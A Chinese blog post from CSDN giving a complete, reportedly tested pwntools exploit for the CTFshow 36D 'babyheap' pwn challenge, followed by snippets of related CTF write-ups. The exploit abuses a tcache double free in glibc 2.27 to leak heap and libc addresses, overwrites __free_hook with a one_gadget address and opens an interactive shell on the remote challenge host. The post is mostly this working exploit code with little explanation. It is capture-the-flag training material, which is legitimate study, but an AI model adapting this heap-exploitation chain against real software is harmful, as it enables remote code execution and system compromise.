CTFshow-36D杯-pwn-babyheap

已于 2022-04-12 06:51:33 修改
阅读量747 收藏
点赞数
文章标签: python
于 2022-04-11 22:18:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCP000111/article/details/124110970
版权

参考博客https://www.xl-bit.cn/index.php/archives/15/
再找wp的时候找了好久,终于找到该师傅的exp,希望后来人能有wp看。不过可能该师傅的博客解码有点问题,导致他的exp不能直接跑通。这里做了整理。
代码如下:
2022.4.11 证明可以跑通

from pwn import *
def new(content):
	p.sendlineafter('>>','1')
	p.sendafter('your 36D:',content)
def free(index):
	p.sendlineafter('>>','2')
	p.sendlineafter('index:',str(index))
def show(index):
	p.sendlineafter('>>','3')
	p.sendlineafter('index:',str(index))
def modify(target,content):
	free(1)
	free(1)
	new(target)
	new('FMYY\n')
	new(content)
#p = process('./pwn')
p = remote('pwn.challenge.ctf.show',28018)
libc =ELF('./libc-2.27.so',checksec=False)
context.log_level ='DEBUG'
new('FMYY\n')
new('FMYY\n')
new('FMYY\n')
new('FMYY\n')
new('FMYY\n')
free(1)
free(0)
free(0)
show(0)
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x10 - 0x250
log.info('HEAP:\t'+ hex(heap_base))
new(p64(heap_base + 0x270) + '\n')
new(p64(0) + p64(0xB1))
new('FAKE\n')
free(2)
modify(p64(heap_base+0x18) + '\n',p64(0xFF00) + '\n')
free(7)
show(7)

libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 - 0x10 - libc.sym['__malloc_hook']
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc.sym['__free_hook'] + libc_base
rce = libc_base + 0x4F322
modify(p64(free_hook) + '\n',p64(rce) + '\n')
free(4)
p.interactive()

在这里插入图片描述
别忘你需要libc-2.27.so文件
python2 运行,如果出现问题就多试几遍。

Steins;G4te
关注
ctfshow reverse36D
m0_58348028的博客
02-20 440
目录 签到 签到 发现这个题只要理解清楚他do-while循环中的东西就好了 推测v8即为flag 经过下面的处理之后才出flag上代码 int main() { char flag[31]; int v4; int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] char v8; int v9[31]; char v10[4]; // [rsp+8Ch] [rbp-4h]
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 414
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
ctfshow 36D crypto
qq_58690059的博客
11-17 784
在用上面的密文进行playfair密码解密,密钥为abcdefghijklmnopqrstuvwxyz。得到(hou_mian_shi_flag)^b^%&(^@^f^!&@^$%f^%^e^#搜一下%0A是可以替换换行的URL编码,将%0A变成换行得到12个32为字符串。将^b^%&(^@^f^!&@^$%f^%^e^#对照键盘转换为数字。本题考查:简单的移位、playfair密码。本题考查:base64、md5。
ctfshow-36D-pwn(1024_happy_unlink )
kissyunlei的博客
01-12 264
可以利用unlink把堆得地址挪移到target处,这样利用edit就可以把atoi地址写入进去,然后show得到,最后在修改堆地址就可以把atoi替换成system,传入payload成功getshell。在edit函数上存在溢出。
CTFShow的36D
最新发布
2302_79135465的博客
07-09 554
这个脚本蕴含了 dword 数据转32位数据,ida脚本提取数据,还有 numpy 库的使用。
ctfshow-web 36D
2202_75812594的博客
05-11 2087
目录 给你shell WEB_RemoteImageDownloader ALL_INFO_U_WANT WUSTCTF_朴实无华_Revenge Login_Only_For_36D 你取吧 WUSTCTF_朴实无华_Revenge_Revenge 你没见过的注入 给你shell 提示:0006464640064064646464006406464064640064006400000000000 function haveFun($_f_g) { $_g
CTFSHOW: 36D misc ez-qrcode
qq_47875210的博客
08-14 1699
本题为:CTFSHOW的36D misc ez-qrcode和攻防世界的qr-easy解法基本一模一样。
36D--记录
Luiino的博客
08-21 446
【代码】36D--记录。
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
CTFShow-36D 2020 pwn
清霂的博客
04-24 369
目录pwn0PWN_MagicString pwn0 #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "pwn0" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) pop_rdi_addr=0x00000000004006d3 sys_addr=0x0000000000
ctfshow--网络迷踪
m0_50043719的博客
09-02 3114
ctfshow--网络迷踪
星盟-pwn-babyheap
qq_65147345的博客
08-01 224
1. 堆重叠获取libc_base地址 2. 使用unsorted attack更改global_max_fast,使chunk进入fastbin 3. 使用fastbin attack更改malloc_hook为one_gadget
[ctf.show.reverse] 36D tiny
weixin_52640415的博客
04-19 275
程序极小,也不能运行也不能用ida,还有个提示 echo $? 用010打开,发现0x20后是一段代码。用pwntools的反编译功能直接反编译 a = open('tiny','rb').read()[0x20:] print(a) from pwn import * context.arch='i386' print(disasm(a)) ''' 0: 5b pop ebx 1: 5b
[ctf.show.reverse] 36D BBBigEqSet
weixin_52640415的博客
04-19 556
用ida打开程序发现程序巨大,F5都不工作了 一点点看汇编,发现似乎是机器生成的,先是输入0x80长的flag,然后有0x80段运算,运算的内容是每一个字符乘一个系数相加后与一个数比较。 .text:0000000000001175 push rbp .text:0000000000001176 mov rbp, rsp .text:0000000000001179 sub rsp,
CTFSHOW 36DCTF(pwn部分wp)
weixin_44296844的博客
05-04 1915
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
[ctf.show.reverse] 36D 签到
weixin_52640415的博客
04-19 546
36D一共4个逆向,难度差太远。 签到这个最简单。由于删除了符号表,所以上来就得先猜函数。 int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx __int64 v4; // rcx int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] int v8; // [rsp+Ch] [rb
CTFshow 36D web系列
羽的博客
05-05 3483
0x01 WEB_你取吧 题目源码 <?php error_reporting(0); show_source(__FILE__); $hint=file_get_contents('php://filter/read=convert.base64-encode/resource=hhh.php'); $code=$_REQUEST['code']; $_=array('a','b','c'...
*ctf 2021 babyheap
z1r0的博客
06-28 236
查看保护 漏洞点在delete这里,存在一个uaf漏洞。 libc题目用的是2.27-3ubuntu1.4,笔者用的2.27-3ubuntu1.5. 这个题目需要注意的是edit的方式 大小是size - 8,是从heap_ptr - 8处开始,所以edit不可以直接修改fd。因为创建名字的时候可以使用0x400大小的size,所以考虑fastbin_dup_consolidate实现泄露libc和overlapping 注意一下edit方式就行了,exp如下...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Steins;G4te

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值